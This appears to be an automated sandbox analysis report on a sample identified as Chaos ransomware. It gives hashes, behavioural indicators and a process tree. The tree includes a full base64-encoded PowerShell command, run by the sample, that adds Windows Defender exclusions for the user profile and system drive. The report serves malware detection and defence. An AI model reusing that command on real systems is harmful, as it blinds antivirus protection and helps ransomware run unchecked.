Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
14-03-2024 19:27
Static task
static1
Behavioral task
behavioral1
Sample
Version 6.8.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Version 6.8.exe
Resource
win10v2004-20240226-en
General
-
Target
Version 6.8.exe
-
Size
1.3MB
-
MD5
5b5065f49718bd167911f12eec35a942
-
SHA1
fe005ea9e2e572c79e881e1c57a21585a9577841
-
SHA256
4265e1f20a3443c5d9401bc2a27d4014ae75c931d60dcd87124e9d01a943a66e
-
SHA512
e33adb710d12380b8cb00c2092ab43f7eb7d2488d07ddee5fba360c0858f8113a008d99780a4da6f35fccc81b3a18058a266481714c8040d57041923d35ab9bb
-
SSDEEP
24576:a67Q2xXDBqBdEa+rfhtb5VUkxD/eL+wP+wJtXJtZW6N9VgWVB:aYQ2xXDBUdGNr5xD/SPpXtWiHgmB
Malware Config
Signatures
-
Chaos
Ransomware family first seen in June 2021.
-
Chaos Ransomware 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\Version 2.8.exe family_chaos behavioral2/memory/4988-17-0x00000000000C0000-0x00000000000FE000-memory.dmp family_chaos -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Version 6.8.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation Version 6.8.exe -
Executes dropped EXE 1 IoCs
Processes:
Version 2.8.exepid process 4988 Version 2.8.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 29 IoCs
Processes:
Version 2.8.exepowershell.exepid process 4988 Version 2.8.exe 4988 Version 2.8.exe 4988 Version 2.8.exe 2872 powershell.exe 2872 powershell.exe 4988 Version 2.8.exe 4988 Version 2.8.exe 4988 Version 2.8.exe 4988 Version 2.8.exe 4988 Version 2.8.exe 4988 Version 2.8.exe 4988 Version 2.8.exe 4988 Version 2.8.exe 4988 Version 2.8.exe 4988 Version 2.8.exe 4988 Version 2.8.exe 4988 Version 2.8.exe 4988 Version 2.8.exe 4988 Version 2.8.exe 4988 Version 2.8.exe 4988 Version 2.8.exe 4988 Version 2.8.exe 4988 Version 2.8.exe 4988 Version 2.8.exe 4988 Version 2.8.exe 4988 Version 2.8.exe 4988 Version 2.8.exe 4988 Version 2.8.exe 4988 Version 2.8.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
Version 2.8.exepowershell.exedescription pid process Token: SeDebugPrivilege 4988 Version 2.8.exe Token: SeDebugPrivilege 2872 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
Version 6.8.exedescription pid process target process PID 1708 wrote to memory of 2872 1708 Version 6.8.exe powershell.exe PID 1708 wrote to memory of 2872 1708 Version 6.8.exe powershell.exe PID 1708 wrote to memory of 4988 1708 Version 6.8.exe Version 2.8.exe PID 1708 wrote to memory of 4988 1708 Version 6.8.exe Version 2.8.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Version 6.8.exe"C:\Users\Admin\AppData\Local\Temp\Version 6.8.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAcQBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AeABwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAZABpACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2872 -
C:\Users\Admin\AppData\Roaming\Version 2.8.exe"C:\Users\Admin\AppData\Roaming\Version 2.8.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4988
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
223KB
MD577a0989f046d5404700debc97727ca2b
SHA1d0bdfdc67862e0bfa491d5d4a3313382a7921625
SHA25699b88ce97064536c370e630245018b15bf87c0c1113e2c4c95bfb7dc1078b647
SHA512f918e3bf1d488cb77f06ede3d565396b8a6391f372e79fd6d148e1afec311143332bd91cb6d3f05fd6b348d40bfd4ae02adc79e20c6031aaa08c1d29d5b83aa9